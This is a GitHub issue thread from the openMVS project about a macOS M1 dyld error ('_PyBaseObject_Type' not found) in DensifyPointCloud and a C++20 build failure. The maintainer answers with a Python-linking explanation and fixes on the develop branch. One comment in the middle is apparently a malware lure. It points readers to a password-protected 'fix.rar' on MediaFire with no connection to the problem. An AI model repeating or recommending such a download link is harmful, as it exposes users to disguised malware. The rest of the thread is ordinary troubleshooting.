### ISSUE TITLE
_PyBaseObject_Type not found in flat namespace when running DensifyPointCloud

### ISSUE THREAD

**Issue by jgilat** [cdcseacave/openMVS#1172]
Hey, I'm having a strange issue running DensifyPointCloud on my Mac M1. When running `$OPENMVS_BIN/DensifyPointCloud scene.mvs` , I'm getting this error: `dyld[7368]: symbol not found in flat namespace '_PyBaseObject_Type'`

- tried these compilations (with VCPKG_ROOT=nil because it messes up the install process on my mac):
	- cmake .. -DOpenMVS_USE_CUDA=OFF -DOpenMVS_USE_PYTHON=OFF -DOpenMVS_USE_CERES=OFF
	- cmake .. -DOpenMVS_USE_CUDA=OFF
- my setup: 
	- `python3 --version` -> `Python 3.11.6`
	- Macbook pro M1
	- MacOS Sequoia, most updated developer beta
- maybe related stuff:
	- before that error, I had the common OpenMVS error of .jpeg file headers not detected so I renamed them all to .jpg to solve it
	- InterfaceCOLMAP from the same build seems to work well
	- tested on v2.2.0
	- can't compile on v2.3.0 due to this (unrelated?) error when building, already reported [here](https://github.com/cdcseacave/openMVS/issues/1138
):
```
openMVS/libs/Common/FastDelegateCPP11.h:155:61: error: no member named 'unique' in 'std::shared_ptr<void>'

  155 |         if ((sizeof(functor_type) > store_size_) || !store_.unique())
```

Any ideas on how to fix this? Thanks!

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cdcseacave** [comment]
The compilation issue on C++20 (`FastDelegateCPP11.h:155: no member named 'unique'`) has been fixed on the `develop` branch (unused legacy delegates were completely removed).

Regarding `dyld: symbol not found in flat namespace '_PyBaseObject_Type'`:
This occurs on macOS when OpenCV or Boost is installed via Homebrew with Python module bindings enabled, and CMake links a library (such as OpenCV Python bindings or Boost.Python) into native executables without linking the Python runtime library (`libpython3.dylib`). 

On latest `develop`:
1. Ensure you pull the latest `develop` branch where C++20 / Clang compilation issues are resolved.
2. Python dependencies are now properly isolated to the `pyOpenMVS` target (`OpenMVS_PYTHON_LIBS` linked `PRIVATE` only to `pyOpenMVS`), preventing Python symbol dependencies from leaking into `DensifyPointCloud` or other CLI tools.
3. If building without Python bindings, you can configure with `-DOpenMVS_USE_PYTHON=OFF`.
